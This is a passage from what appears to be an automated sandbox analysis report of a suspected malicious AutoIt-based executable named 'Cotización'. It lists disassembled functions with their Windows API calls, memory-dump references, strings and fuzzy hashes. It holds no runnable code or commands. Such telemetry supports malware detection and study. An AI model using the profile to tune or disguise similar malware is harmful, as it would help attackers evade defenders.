                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                APIs
                • GetDesktopWindow.USER32 ref: 00472B63
                • GetDC.USER32(00000000), ref: 00472B6C
                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                APIs
                • GetDesktopWindow.USER32 ref: 00472BB2
                • GetDC.USER32(00000000), ref: 00472BBB
                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                APIs
                • __getptd_noexit.LIBCMT ref: 00415150
                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                • __freeptd.LIBCMT ref: 0041516B
                • ExitThread.KERNEL32 ref: 00415173
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                • String ID:
                • API String ID: 1454798553-0
                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _strncmp
                • String ID: Q\E
                • API String ID: 909875538-2189900498
                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                APIs
                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                • String ID: AutoIt3GUI$Container
                • API String ID: 2652923123-3941886329
                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove_strncmp
                • String ID: U$\
                • API String ID: 2666721431-100911408
                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • __wcsnicmp.LIBCMT ref: 00467288
                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                • String ID: LPT
                • API String ID: 3035604524-1350329615
                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \$h
                • API String ID: 4104443479-677774858
                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memcmp
                • String ID: &
                • API String ID: 2931989736-1010288
                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                APIs
                • _wcslen.LIBCMT ref: 00466825
                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CrackInternet_wcslen
                • String ID: |
                • API String ID: 596671847-2343686810
                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                APIs
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: '
                • API String ID: 3850602802-1997036262
                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                APIs
                • _strlen.LIBCMT ref: 0040F858
                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                • _sprintf.LIBCMT ref: 0040F9AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove$_sprintf_strlen
                • String ID: %02X
                • API String ID: 1921645428-436463671
                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                APIs
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: Combobox
                • API String ID: 3850602802-2096851135
                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                APIs
                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: LengthMessageSendTextWindow
                • String ID: edit
                • API String ID: 2978978980-2167791130
                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                APIs
                • Sleep.KERNEL32(00000000), ref: 00476CB0
                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: GlobalMemorySleepStatus
                • String ID: @
                • API String ID: 2783356886-2766056989
                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
